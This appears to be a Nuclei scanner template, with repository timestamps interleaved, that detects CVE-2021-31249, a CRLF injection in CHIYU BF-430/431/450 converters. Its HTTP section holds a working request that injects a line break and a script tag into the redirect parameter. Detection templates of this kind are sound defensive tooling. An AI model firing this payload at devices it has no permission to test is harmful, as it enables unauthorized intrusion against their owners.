2021-07-26 17:18:45 +00:00
id : CVE-2021-31249
info :
2023-04-06 18:18:20 +00:00
name : CHIYU TCP/IP Converter - Carriage Return Line Feed Injection
2021-07-26 17:18:45 +00:00
author : geeknik
severity : medium
2023-04-06 18:18:20 +00:00
description : CHIYU TCP/IP Converter BF-430, BF-431, and BF-450 are susceptible to carriage return line feed injection. The redirect= parameter, available on multiple CGI components, is not properly validated, thus enabling an attacker to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability can lead to remote code execution, unauthorized access, or data manipulation.
2023-09-06 12:09:01 +00:00
remediation : |
Apply the latest security patches or updates provided by the vendor to fix the vulnerability.
2022-04-22 10:38:41 +00:00
reference :
- https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249
2022-05-17 09:18:12 +00:00
- https://www.chiyu-tech.com/msg/message-Firmware-update-87.html
- https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks/
2023-04-06 18:18:20 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-31249
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-31249
2023-08-31 11:46:18 +00:00
cwe-id : CWE-74
epss-score : 0.00331
2024-01-14 13:49:27 +00:00
epss-percentile : 0.68046
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:o:chiyu-tech:bf-430_firmware:-:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : chiyu-tech
product : bf-430_firmware
2024-01-14 09:21:50 +00:00
tags : cve2021,cve,chiyu,crlf,iot,chiyu-tech
2021-07-26 17:18:45 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-26 17:18:45 +00:00
- method : GET
path :
- "{{BaseURL}}/man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY"
matchers-condition : and
matchers :
- type : word
part : header
words :
- "Location: setting.htm"
- "<script>alert(document.domain)</script>"
condition : and
2023-07-11 19:49:27 +00:00
- type : status
status :
- 302
2024-01-14 14:05:19 +00:00
# digest: 4a0a00473045022100d9052bb23d2738eb67c2fd9b12a12a40095c81993cfb95c4fbb06a0a22767e56022027a577d1179c627b1ab459dc2b181306e6b9d752095fe49237b5c5a2c4d96a53:922c64590222798bb761d5b6d8e72950